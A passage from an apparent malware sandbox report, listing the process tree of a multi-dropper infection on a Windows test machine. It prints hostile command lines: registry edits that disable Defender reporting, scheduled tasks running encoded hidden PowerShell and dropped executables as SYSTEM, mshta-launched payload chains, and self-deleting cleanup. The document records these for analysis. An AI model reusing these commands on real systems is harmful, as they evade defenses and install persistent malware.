        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:8512
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:9908
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:7892
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:10968
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gAfakHSBx" /SC once /ST 15:32:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:8628
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gAfakHSBx"
        7⤵
        
        PID:10076
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gAfakHSBx"
        7⤵
        
        PID:11112
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 22:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exe\" XY /site_id 668658 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:9116
  - - C:\Users\Admin\Documents\80fKkz4YE_xOc_H4VRK1L50y.exe
      "C:\Users\Admin\Documents\80fKkz4YE_xOc_H4VRK1L50y.exe"
      4⤵
      PID:10516
    - - C:\ProgramData\8862011.exe
        
        "C:\ProgramData\8862011.exe"
        5⤵
        
        PID:10852
    - - C:\ProgramData\3780464.exe
        
        "C:\ProgramData\3780464.exe"
        5⤵
        
        PID:9964
    - - C:\ProgramData\3353996.exe
        
        "C:\ProgramData\3353996.exe"
        5⤵
        
        PID:7132
  - - C:\Users\Admin\Documents\LhoEvLqaCtzHYw9fKanbEvs1.exe
      "C:\Users\Admin\Documents\LhoEvLqaCtzHYw9fKanbEvs1.exe"
      4⤵
      PID:11232
  - - C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe
      "C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe"
      4⤵
      PID:5516
    - - C:\Users\Admin\AppData\Local\Temp\is-IQ6HL.tmp\Sb5sDU90bNy1ZbHTIvsJW1oI.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IQ6HL.tmp\Sb5sDU90bNy1ZbHTIvsJW1oI.tmp" /SL5="$502E4,506127,422400,C:\Users\Admin\Documents\Sb5sDU90bNy1ZbHTIvsJW1oI.exe"
        5⤵
        
        PID:10956
      - C:\Users\Admin\AppData\Local\Temp\is-HI99K.tmp\Chmenka.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HI99K.tmp\Chmenka.exe" /S /UID=124
        6⤵
        
        PID:11168
        
        C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe
        
        "C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe" /VERYSILENT
        7⤵
        
        PID:7928
        
        C:\Users\Admin\AppData\Local\Temp\is-6T6C1.tmp\IDownload.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6T6C1.tmp\IDownload.tmp" /SL5="$505E6,994212,425984,C:\Program Files\Windows Sidebar\KJOWQDMYEV\IDownload.exe" /VERYSILENT
        8⤵
        
        PID:9132
        
        C:\Program Files (x86)\IDownload\IDownload.App.exe
        
        "C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu
        9⤵
        
        PID:5452
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qeeorm2u.cmdline"
        10⤵
        
        PID:10156
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9435.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9434.tmp"
        11⤵
        
        PID:10148
        
        C:\Users\Admin\AppData\Local\Temp\d2-84a9d-8c8-18baf-521b7a95153ee\Havyraehyba.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d2-84a9d-8c8-18baf-521b7a95153ee\Havyraehyba.exe"
        7⤵
        
        PID:7380
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exe /eufive & exit
        8⤵
        
        PID:9760
        
        C:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\aj1hcrtg.vch\GcleanerEU.exe /eufive
        9⤵
        
        PID:10048
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exe /qn CAMPAIGN="654" & exit
        8⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\aiankqxu.ghf\installer.exe /qn CAMPAIGN="654"
        9⤵
        
        PID:6816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exe & exit
        8⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\c0wlwvxf.0yq\anyname.exe
        9⤵
        
        PID:10644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exe /mixfive & exit
        8⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\slrwaayc.if4\gcleaner.exe /mixfive
        9⤵
        
        PID:11188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ftqa13it.y0g\autosubplayer.exe /S & exit
        8⤵
        
        PID:9776
        
        C:\Users\Admin\AppData\Local\Temp\ec-8f902-eda-9cfb7-d604307b58280\Vaeqypehoma.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ec-8f902-eda-9cfb7-d604307b58280\Vaeqypehoma.exe"
        7⤵
        
        PID:7840
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1988
        8⤵
        
        PID:8600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7388
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6104
- C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe
  "C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe"
  2⤵
  PID:5768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im jNc1pEtkubgEg8zfQEcmSPJb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\jNc1pEtkubgEg8zfQEcmSPJb.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:8544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im jNc1pEtkubgEg8zfQEcmSPJb.exe /f
      4⤵
      Kills process with taskkill
      PID:8876
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:7324
- C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe
  "C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe"
  2⤵
  - Executes dropped EXE
  PID:6000
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\IeEnYAjtISOkrI8ktFcjax_C.exe"
    3⤵
    PID:8516
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:8848
- C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe
  "C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5984
- - C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe
    C:\Users\Admin\Documents\pUiOCGpiuWE56__g7zn7wgiy.exe
    3⤵
    - Executes dropped EXE
    PID:4624
- C:\Users\Admin\Documents\EFSrSTr3JXsgTz2Mqfr4osXz.exe
  "C:\Users\Admin\Documents\EFSrSTr3JXsgTz2Mqfr4osXz.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5928
- C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe
  "C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"
  2⤵
  - Executes dropped EXE
  PID:6052
- - C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe
    "C:\Users\Admin\Documents\Ctmuz_mgcbdsPCC6e_V8tHCx.exe"
    3⤵
    PID:11004
- C:\Users\Admin\Documents\eT_9cn5sogyGhue3prfopPYK.exe
  "C:\Users\Admin\Documents\eT_9cn5sogyGhue3prfopPYK.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:2704
- C:\Users\Admin\Documents\IcbJmhRrOFBl0UiaasKlmKnL.exe
  "C:\Users\Admin\Documents\IcbJmhRrOFBl0UiaasKlmKnL.exe"
  2⤵
  - Executes dropped EXE
  PID:4612
- C:\Users\Admin\Documents\yHhWol0ocSjBIpiSrBNEOAvh.exe
  "C:\Users\Admin\Documents\yHhWol0ocSjBIpiSrBNEOAvh.exe"
  2⤵
  - Executes dropped EXE
  PID:5296
- C:\Users\Admin\Documents\FfdIL49jVDLo2ZZ0ZoNZ1NHV.exe
  "C:\Users\Admin\Documents\FfdIL49jVDLo2ZZ0ZoNZ1NHV.exe"
  2⤵
  PID:5140
- C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe
  "C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"
  2⤵
  - Executes dropped EXE
  PID:3936
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )
    3⤵
    PID:7092
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF ""== "" for %w In ("C:\Users\Admin\Documents\nCnloXCBBzF9fhloqAx3zURj.exe" ) do taskkill /F -iM "%~nxw"
      4⤵
      PID:8504
    - - C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe
        
        Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj
        5⤵
        
        PID:9068
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )
        6⤵
        
        PID:8492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ("C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"
        7⤵
        
        PID:4272
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ
        6⤵
        
        PID:11032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -iM "nCnloXCBBzF9fhloqAx3zURj.exe"
        5⤵
        Kills process with taskkill
        
        PID:4928
- C:\Users\Admin\Documents\GdnnpR16mo1HV765iNORwo65.exe
  "C:\Users\Admin\Documents\GdnnpR16mo1HV765iNORwo65.exe"
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe
  "C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe"
  2⤵
  - Executes dropped EXE
  PID:4700
- - C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe
    C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe
    3⤵
    PID:2184
  - - C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe
      C:\Users\Admin\Documents\soiMKi5zPb7mknIYe5Cn6mWq.exe
      4⤵
      PID:3104
- C:\Users\Admin\Documents\qGRZQFt259hYnjlOy8zzT1Jx.exe
  "C:\Users\Admin\Documents\qGRZQFt259hYnjlOy8zzT1Jx.exe"
  2⤵
  PID:4688
- C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe
  "C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"
  2⤵
  PID:1016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:7356
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:7472
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    PID:8212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa53544f50,0x7ffa53544f60,0x7ffa53544f70
      4⤵
      PID:4532
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:2
      4⤵
      PID:7388
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2236 /prefetch:8
      4⤵
      PID:5512
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1696 /prefetch:8
      4⤵
      PID:4324
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
      4⤵
      PID:10052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
      4⤵
      PID:10068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
      4⤵
      PID:9292
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
      4⤵
      PID:9364
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
      4⤵
      PID:7016
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
      4⤵
      PID:9568
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5864 /prefetch:8
      4⤵
      PID:11108
  - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
      4⤵
      PID:8196
    - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff6729da890,0x7ff6729da8a0,0x7ff6729da8b0
        5⤵
        
        PID:9136
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1564 /prefetch:8
      4⤵
      PID:10156
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:8
      4⤵
      PID:9996
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3868 /prefetch:8
      4⤵
      PID:3912
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2424 /prefetch:2
      4⤵
      PID:9936
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 1016 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"
    3⤵
    PID:7816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 1016
      4⤵
      Kills process with taskkill
      PID:7272
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 1016 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"
    3⤵
    PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 1016
      4⤵
      Kills process with taskkill
      PID:5856
- C:\Users\Admin\Documents\zBp8YnD2JXhNdNSO2cXYtDbH.exe
  "C:\Users\Admin\Documents\zBp8YnD2JXhNdNSO2cXYtDbH.exe"
  2⤵
  PID:4052
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    PID:8740
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    PID:8732
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    PID:8724
- C:\Users\Admin\Documents\l0ej5qCi8D_Au3CkPDt9h0Ab.exe
  "C:\Users\Admin\Documents\l0ej5qCi8D_Au3CkPDt9h0Ab.exe"
  2⤵
  PID:6304
- C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe
  "C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"
  2⤵
  PID:5716
- - C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe
    "C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"
    3⤵
    PID:8992
- C:\Users\Admin\Documents\Fux0ZZm5H25xraVbRQlbSAF7.exe
  "C:\Users\Admin\Documents\Fux0ZZm5H25xraVbRQlbSAF7.exe"
  2⤵
  PID:5376
- C:\Users\Admin\Documents\tpyQPnPO7SqogN2DfeVUhKk7.exe
  "C:\Users\Admin\Documents\tpyQPnPO7SqogN2DfeVUhKk7.exe"
  2⤵
  PID:4364
- C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe
  "C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"
  2⤵
  PID:4920
- - C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe
    "C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"
    3⤵
    PID:6480
- C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe
  "C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"
  2⤵
  PID:4848
- - C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe
    "C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"
    3⤵
    PID:5532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im uTpzrAONESiMFhgZLv5DlXEm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:10376
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im uTpzrAONESiMFhgZLv5DlXEm.exe /f
        5⤵
        Kills process with taskkill
        
        PID:10796
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:8640
- C:\Users\Admin\Documents\k4w_yyhWh86CBJZACljQ7P_u.exe
  "C:\Users\Admin\Documents\k4w_yyhWh86CBJZACljQ7P_u.exe"
  2⤵
  PID:6864
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:8756
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      PID:6556
- C:\Users\Admin\Documents\UaGrhUshy9hYCI_hBc5fm_Go.exe
  "C:\Users\Admin\Documents\UaGrhUshy9hYCI_hBc5fm_Go.exe"
  2⤵
  PID:7208
- - C:\Users\Admin\AppData\Roaming\8564909.scr
    "C:\Users\Admin\AppData\Roaming\8564909.scr" /S
    3⤵
    PID:5652
- - C:\Users\Admin\AppData\Roaming\6795236.scr
    "C:\Users\Admin\AppData\Roaming\6795236.scr" /S
    3⤵
    PID:8228
- C:\Users\Admin\Documents\l9z5ZNb4Iw2fbvEJYpxTKJtS.exe
  "C:\Users\Admin\Documents\l9z5ZNb4Iw2fbvEJYpxTKJtS.exe"
  2⤵
  PID:7200
- C:\Users\Admin\Documents\7To_uDprOzB4ym5g4y1Xt9BU.exe
  "C:\Users\Admin\Documents\7To_uDprOzB4ym5g4y1Xt9BU.exe"
  2⤵
  PID:7192
- C:\Users\Admin\Documents\3wxQfLEfkH8FuCje9rwrYIjL.exe
  "C:\Users\Admin\Documents\3wxQfLEfkH8FuCje9rwrYIjL.exe"
  2⤵
  PID:7184
- C:\Users\Admin\Documents\cEio288hwuKoR76YXemh7cs9.exe
